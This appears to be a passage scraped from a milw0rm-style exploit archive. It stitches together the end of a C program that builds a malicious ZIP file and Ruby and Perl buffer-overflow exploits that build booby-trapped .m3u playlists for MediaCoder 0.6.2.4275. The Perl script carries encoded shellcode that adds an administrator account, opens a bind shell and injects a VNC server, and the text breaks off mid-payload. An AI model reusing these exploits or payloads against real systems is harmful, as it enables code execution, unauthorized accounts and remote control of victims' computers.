0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x41, 0x49, 0x89, 0x04, 0x02, 0x12, 0x01, 0x61, 0x82, 0xFD, 0x81, 0x98,
0x98, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32,
0x2E, 0x74, 0x78, 0x74, 0x50, 0x4B, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0x42, 0x08, 0x00, 0x00, 0x32, 0x08, 0x00, 0x00, 0x00, 0x00,
};


#define NEXT_SEH 2196
#define SEH_CHAIN 2200

#define SIZE 90000



int main (int argc, char *argv[])
{
int offset = 0,
i = 0,
next = 0x41414141,
seh_chain = 0x58585858;

char buffer[SIZE];

FILE *f;
f = fopen ("file.zip", "w");
assert (f !=NULL);

do {
buffer[i] = 0x90;
i++;
}while (i < SIZE);

memcpy (buffer, file, sizeof (file)); offset = NEXT_SEH;
memcpy (buffer + offset, &next, 4); offset = 0; offset = SEH_CHAIN;
memcpy (buffer + offset, &seh_chain, 4);
fwrite (buffer,1 ,sizeof (file), f);
fclose (f);
free (buffer);
return 0;
}

#milw0rm

MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)

#!/usr/bin/env ruby
# MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
# Universal SEH Overwrite Exploit
# By Stack
# Mountassif Moad
# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
time3 = Time.new
puts "Exploit Started in Current Time :" + time3.inspect
puts "Enter Name For your File Like : Stack"
files = gets.chomp.capitalize
puts "Name Of File : " + files +'.m3u'
time1 = Time.new
$VERBOSE=nil
Header =
"\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46"+
"\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"+
"\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"+
"\x0D\x0A\x44\x3A\x5C"
# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
Shellscode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+
"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+
"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+
"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+
"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+
"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+
"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+
"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+
"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+
"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+
"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+
"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+
"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+
"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+
"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+
"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+
"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+
"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+
"\x41\x54\x46\x54\x46\x54\x42\x50\x5a"
# Media_bruteforcer_shellcode
Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode
"\xD0\x62\x43"+ # SHL BYTE PTR DS:[EDX+43],1
"\x00\xB8\x6D"+ # ADD BYTE PTR DS:[EAX+1ABBB6D],BH
"\xBB\xAB\x01"+
"\x00\x00"+ # ADD BYTE PTR DS:[EAX],AL
"\x00\xF0"+ # ADD AL,DH
"\xFF\x13"+ # CALL DWORD PTR DS:[EBX]
"\x00\x4F\x6D"+ # ADD BYTE PTR DS:[EDI+6D],CL
"\x81\x7C\x38\x07"+ # CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92
"\x92\x7C\xFF"+
"\xFF\xFF" + Shellscode
Rhunter =
"\x5B"+ #POP EBX
"\x90" * 10 + # NOP x 10
"\x90\x90"+ # NOP NOP
"\x8D\x44\xC1\x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4]
"\x8B\x1E"+ # MOV EBX,DWORD PTR DS:[ESI]
"\x89\x18"+ # MOV DWORD PTR DS:[EAX],EBX
"\x89\x06"+ # MOV DWORD PTR DS:[ESI],EAX
"\x42"+ # INC EDX
"\x83\xFA\x64"+ # CMP EDX,64
"\x75\xEC"+ # JNZ SHORT dsp_chmx.0169127E
"\x8B\x06"+ # MOV EAX,DWORD PTR DS:[ESI]
"\x8B\x10"+ # MOV EDX,DWORD PTR DS:[EAX]
"\x89\x16"+ # MOV DWORD PTR DS:[ESI],EDX
"\x5E"+ # POP ESI
"\x5B"+ # POP EBX
"\x93\x43"+ # CALL ESP
"\x92\x7c"
Over = "\x41" * 195 + "\xff\xff\xff\xff" + "\x47" * 4 + "\x42" * 6 + "\xff\xff\x47\x47\x47\xFF\x65\x78\x77\x76"
Nop = "\x90" * 8
Next_Seh = "\xeb\x06\xff\xff"
Seh = "\x93\xB6\x98\x7C"
Nopsled = "\x90" * 7
Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled
File.open( files+".m3u", "w" ) do |the_file|
the_file.puts(Xpl)
puts "Exploit finished in Current Time :" + time1.inspect
puts "Now Open " + files +".m3u :d"
end

# milw0rm

MediaCoder 0.6.2.4275 (m3u File) Universal Stack Overflow Exploit

#!/usr/bin/perl
# MediaCoder 0.6.2.4275 Universal Stack Based Overflow
# By Stack
# Mountassif Moad
# cat Greatz.txt
# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
my $header= "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46".
"\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F".
"\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20".
"\x0D\x0A\x44\x3A\x5C";

my $junk = "\x41" x 254;
my $ret = "\x93\x43\x92\x7c"; # Universal return adress :d
my $nop = "\x90" x 25;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $calc_shell =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x43\x4b\x38\x4e\x47".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48".
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x53\x4b\x48".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x38".
"\x4f\x45\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x50\x4b\x54".
"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43".
"\x42\x4c\x46\x36\x4b\x58\x42\x34\x42\x33\x45\x48\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x47\x4e\x41\x4d\x4a".
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b".
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x45\x41\x33".
"\x48\x4f\x42\x36\x48\x45\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x55\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x36".
"\x4e\x56\x43\x36\x50\x32\x45\x36\x4a\x57\x45\x56\x42\x30\x5a";

# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
my $adduser_shell =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x30\x42\x50\x4b\x58\x45\x54\x4e\x43\x4b\x58\x4e\x37".
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x31\x4b\x48".
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x58".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x45\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x58".
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x58\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53".
"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x34\x4e\x30\x4b\x58\x42\x47\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53".
"\x48\x4f\x42\x46\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x45\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x56\x4a\x49".
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x36\x4d\x46".
"\x46\x36\x50\x52\x45\x56\x4a\x57\x45\x36\x42\x52\x4f\x42\x43\x56".
"\x42\x42\x50\x56\x45\x36\x46\x37\x42\x52\x45\x37\x43\x47\x45\x46".
"\x44\x57\x42\x52\x44\x57\x4f\x56\x4f\x56\x46\x37\x42\x42\x46\x57".
"\x4f\x46\x4f\x46\x44\x37\x42\x42\x4f\x52\x41\x44\x46\x34\x46\x34".
"\x42\x42\x48\x32\x48\x52\x42\x32\x50\x36\x45\x46\x46\x47\x42\x42".
"\x4e\x56\x4f\x56\x43\x46\x41\x56\x4e\x46\x47\x36\x44\x37\x4f\x56".
"\x45\x47\x42\x57\x42\x42\x41\x44\x46\x36\x4d\x46\x49\x46\x50\x56".
"\x49\x36\x43\x57\x46\x37\x44\x37\x41\x56\x46\x37\x4f\x46\x44\x57".
"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x56\x46\x47\x42\x32\x4f\x32".
"\x41\x44\x46\x44\x46\x34\x42\x50\x5a";

# win32_bind - EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $bind_shell =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e".
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38".
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x53\x4b\x58\x4e\x47".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x31\x4b\x58".
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x45\x46\x52\x4a\x52\x45\x37\x45\x4e\x4b\x48".
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34".
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38".
"\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d".
"\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48".
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x56".
"\x50\x58\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56".
"\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x36\x47\x37\x43\x47".
"\x44\x33\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e".
"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x30".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
"\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x45\x43\x55\x43\x55\x43\x34".
"\x43\x45\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x45\x41".
"\x43\x4b\x48\x36\x43\x45\x49\x38\x41\x4e\x45\x49\x4a\x56\x46\x4a".
"\x4c\x41\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52".
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d".
"\x42\x45\x46\x35\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45".
"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36".
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x32".
"\x43\x39\x4d\x38\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f".
"\x48\x4d\x4b\x35\x47\x35\x44\x45\x41\x55\x41\x35\x41\x55\x4c\x36".
"\x41\x30\x41\x55\x41\x35\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x46".
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
"\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
my $bind_vncinject =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50".
"\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36".
"\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30".
"\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55".
"\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33".
"\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c".
"\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30".
"\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51".
"\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56".
"\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e".
"\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43".
"\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50".
"\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38".
"\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58".
"\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e".
"\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50".
"\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e".
"\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50".
"\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e".
"\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c".
"\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a".
"\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45".
"\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55".
"\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47".
"\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43".
"\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48".
"\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f".
"\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55".
"\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48".
"\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50".
"\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55".
"\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32".
